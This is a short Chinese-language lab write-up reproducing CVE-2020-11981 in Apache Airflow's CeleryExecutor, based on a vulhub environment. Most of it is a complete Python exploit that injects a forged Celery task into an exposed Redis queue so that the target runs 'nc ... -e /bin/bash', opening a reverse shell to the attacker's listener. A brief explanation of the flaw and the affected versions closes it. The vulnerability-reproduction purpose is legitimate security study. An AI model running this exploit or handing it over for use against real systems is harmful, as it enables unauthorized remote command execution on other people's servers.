0x00 项目地址
https://github.com/vulhub/vulhub/blob/master/airflow/CVE-2020-11981/README.zh-cn.md
0x01漏洞复现
假定靶机IP:192.168.45.128
,攻击机IP:192.168.45.130
输入命令vim cve-2020-11981.py
,写入以下内容
import pickle
import json
import base64
import redis
import sys
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0)
queue_name = 'default'
ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ==\"}"
task_dict = json.loads(ori_str)
command = ['nc', '192.168.45.130', '4444', '-e', '/bin/bash']
body=[[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
task_dict['body']=base64.b64encode(json.dumps(body).encode()).decode()
for i in command:
print(i,end=' ')
r.lpush(queue_name,json.dumps(task_dict))
然后另起一个终端,输入nc -lvp 4444
,回到原终端执行命令python3 cve-2020-11981.py 192.168.45.128
,即可连接到目标靶机
0x02 漏洞原理
利用Airflow的CeleryExecutor类来进行命令执行,可利用版本小于1.10.10
写入一个JSON任务消息执行airflow.executors.celery_executor.execute_command
到airflow的celery redis队列